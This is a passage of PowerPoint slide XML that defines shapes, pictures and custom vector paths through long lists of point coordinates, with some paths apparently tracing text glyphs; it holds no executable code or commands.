            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2814978" y="3141050"/>
              <a:ext cx="1098550" cy="535305"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1098550" h="535304">
                  <a:moveTo>
                    <a:pt x="716426" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="115161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="381897"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="382376" y="535164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1097954" y="414921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1097954" y="143952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="716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E381D2A6-55F8-5D07-25AC-E50AF40E1F1D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3198203" y="3283309"/>
              <a:ext cx="716915" cy="393065"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="716914" h="393064">
                  <a:moveTo>
                    <a:pt x="713882" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="115161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="392905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112762" y="372582"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="357789" y="330243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="602815" y="288751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="685055" y="275203"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="707099" y="272662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="716426" y="272662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="713882" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="E8EBE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370C6258-74FA-D103-C634-01D9CE515F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4978" y="3143590"/>
              <a:ext cx="1088628" cy="532624"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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988F21D8-600C-9C09-496A-EF1D8835A07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5228" y="2547684"/>
              <a:ext cx="1571044" cy="1300317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6B3F179D-952E-D881-15E3-73A7B673909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3312" y="2698185"/>
              <a:ext cx="496835" cy="55040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736056A9-52DD-CB95-5B7C-8F1B5177C99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733" y="3318874"/>
              <a:ext cx="223830" cy="168509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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9CC4BA3F-801E-2FB6-6286-F31103CACD83}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3275804" y="3865938"/>
              <a:ext cx="628015" cy="107314"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="628014" h="107314">
                  <a:moveTo>
                    <a:pt x="54655" y="2687"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="41872" y="2687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35164" y="3838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1174" y="39155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="46561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="63542"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18180" y="98429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41895" y="106761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53052" y="106761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78595" y="99739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80831" y="98723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83316" y="97639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83316" y="95223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43837" y="95223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39388" y="94432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13912" y="61893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13912" y="48074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14770" y="42135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43295" y="14090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83316" y="14090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83316" y="11538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76743" y="8241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70781" y="5961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60030" y="3341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54655" y="2687"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="628014" h="107314">
                  <a:moveTo>
                    <a:pt x="83316" y="82013"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="82367" y="82013"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77466" y="86416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73718" y="88764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71973" y="89803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60956" y="94116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54949" y="95223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83316" y="95223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83316" y="82013"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="628014" h="107314">
                  <a:moveTo>
                    <a:pt x="83316" y="14090"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="54587" y="14090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60392" y="15151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71278" y="19374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76766" y="22738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82299" y="27367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83316" y="27367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83316" y="14090"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="628014" h="107314">
                  <a:moveTo>
                    <a:pt x="116899" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="104229" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104229" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116899" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116899" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="628014" h="107314">
                  <a:moveTo>
                    <a:pt x="156762" y="3838"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="142466" y="3838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142466" y="16980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156762" y="16980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156762" y="3838"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="628014" h="107314">
                  <a:moveTo>
                    <a:pt x="155949" y="29603"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="143279" y="29603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143279" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155949" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155949" y="29603"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="628014" h="107314">
                  <a:moveTo>
                    <a:pt x="223659" y="27503"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="213495" y="27503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="205662" y="28184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177494" y="58941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176863" y="67697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177523" y="76511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207907" y="106084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208157" y="106084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216657" y="106694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221558" y="106694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="226233" y="106084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="235154" y="103645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239513" y="102155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243782" y="100348"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243782" y="95629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212660" y="95629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209114" y="95087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202700" y="92919"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="199922" y="91316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197573" y="89148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195156" y="86958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="193319" y="84257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190459" y="77248"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189759" y="73206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189759" y="68577"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245273" y="68577"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245273" y="61713"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245087" y="58941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189752" y="58941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190205" y="53982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190301" y="52929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192582" y="47961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200622" y="39967"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206020" y="37958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238137" y="37958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237006" y="36422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231496" y="30484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="223659" y="27503"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="628014" h="107314">
                  <a:moveTo>
                    <a:pt x="243782" y="86529"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="243104" y="86529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="240914" y="88493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237210" y="90503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="226821" y="94613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221649" y="95629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243782" y="95629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243782" y="86529"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="628014" h="107314">
                  <a:moveTo>
                    <a:pt x="238137" y="37958"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="219571" y="37958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224585" y="39787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231202" y="47058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232873" y="52206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232919" y="58941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245087" y="58941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244756" y="53982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243206" y="47188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="240623" y="41333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238137" y="37958"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="628014" h="107314">
                  <a:moveTo>
                    <a:pt x="279670" y="29603"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="266977" y="29603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="266977" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="279670" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="279670" y="48684"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="283125" y="46042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286739" y="43851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="294305" y="40442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="297918" y="39584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327686" y="39584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="326270" y="37958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="279670" y="37958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="279670" y="29603"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="628014" h="107314">
                  <a:moveTo>
                    <a:pt x="327686" y="39584"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="304761" y="39584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="307494" y="40035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="311718" y="41887"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="313344" y="43287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="314473" y="45184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="315557" y="46900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="316302" y="49271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317093" y="55322"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317296" y="58574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317296" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="329989" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="329989" y="46900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="329749" y="46042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="328049" y="40442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327926" y="40035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327843" y="39764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327686" y="39584"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="628014" h="107314">
                  <a:moveTo>
                    <a:pt x="313095" y="27503"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="300515" y="27503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="296179" y="28429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="287710" y="32109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="283622" y="34684"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="279670" y="37958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="326270" y="37958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="319306" y="29964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="313095" y="27503"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="628014" h="107314">
                  <a:moveTo>
                    <a:pt x="369987" y="40261"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="357294" y="40261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="357294" y="89442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="359304" y="96081"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="367299" y="104345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="373149" y="106423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="383041" y="106423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="385548" y="106219"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="391172" y="105406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="393769" y="104887"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="395821" y="104345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="396163" y="104345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="396163" y="95290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="380602" y="95290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="378655" y="94974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="378198" y="94974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="374577" y="93258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370077" y="81629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="369987" y="40261"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="628014" h="107314">
                  <a:moveTo>
                    <a:pt x="396163" y="92852"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="395485" y="92852"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="394492" y="93258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="392866" y="93777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390630" y="94387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="388371" y="94974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="386226" y="95290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="396163" y="95290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="396163" y="92852"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="628014" h="107314">
                  <a:moveTo>
                    <a:pt x="396163" y="29603"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="348734" y="29603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="348734" y="40261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="396163" y="40261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="396163" y="29603"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="628014" h="107314">
                  <a:moveTo>
                    <a:pt x="369987" y="7948"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="357294" y="7948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="357294" y="29603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="369987" y="29603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="369987" y="7948"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="628014" h="107314">
                  <a:moveTo>
                    <a:pt x="497411" y="4516"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="464144" y="4516"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="464144" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="477491" y="104932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="477491" y="67493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="498044" y="67493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="504006" y="66635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="513447" y="63180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="517535" y="60584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="522007" y="56113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="477491" y="56113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="477491" y="15987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="524105" y="15987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="521668" y="13345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="514599" y="8625"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="510895" y="7045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="502516" y="5012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="497411" y="4516"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="628014" h="107314">
                  <a:moveTo>
                    <a:pt x="524105" y="15987"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="494950" y="15987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="498450" y="16280"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="503984" y="17500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="515954" y="38161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="515502" y="40848"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="494159" y="56113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="522007" y="56113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="523791" y="54329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525959" y="51032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="529076" y="43445"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="529844" y="39313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="529780" y="28722"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="528805" y="24183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="524626" y="16551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="524105" y="15987"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="628014" h="107314">
                  <a:moveTo>
                    <a:pt x="598841" y="2687"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="586080" y="2687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="579372" y="3838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="547708" y="32629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="544208" y="46561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="544208" y="63542"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562389" y="98429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="586103" y="106761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="597260" y="106761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="622803" y="99739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="625039" y="98723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="627524" y="97639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="627524" y="95223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="588022" y="95223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="583596" y="94432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="558097" y="61893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="558097" y="48074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="558978" y="42135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="587503" y="14090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="627524" y="14090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="627524" y="11538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620951" y="8241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="614989" y="5961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="604238" y="3341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="598841" y="2687"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="628014" h="107314">
                  <a:moveTo>
                    <a:pt x="627524" y="82013"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="626575" y="82013"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="621674" y="86416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="617926" y="88764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="616181" y="89803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="605164" y="94116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="599134" y="95223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="627524" y="95223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="627524" y="82013"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="628014" h="107314">
                  <a:moveTo>
                    <a:pt x="627524" y="14090"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="598773" y="14090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="604600" y="15151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="615486" y="19374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620974" y="22738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="626507" y="27367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="627524" y="27367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="627524" y="14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B05C6E7E-6A0A-60D4-2AE9-C1C14F61A7B9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7229119" y="4187189"/>
              <a:ext cx="934085" cy="311150"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="934084" h="311150">
                  <a:moveTo>
                    <a:pt x="933919" y="194957"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="915454" y="139877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="854075" y="88531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="809891" y="65595"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="758088" y="45212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="699706" y="27901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="635774" y="14211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="567334" y="4673"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="498386" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="433006" y="317"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="372313" y="5321"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317449" y="14681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="269506" y="28092"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229628" y="45237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="178549" y="89471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="169595" y="115925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172948" y="143675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184061" y="163779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164782" y="160083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102806" y="159029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51142" y="168275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15113" y="186194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="211137"/>
                  </a:lnTo>
                  <a:lnTo>
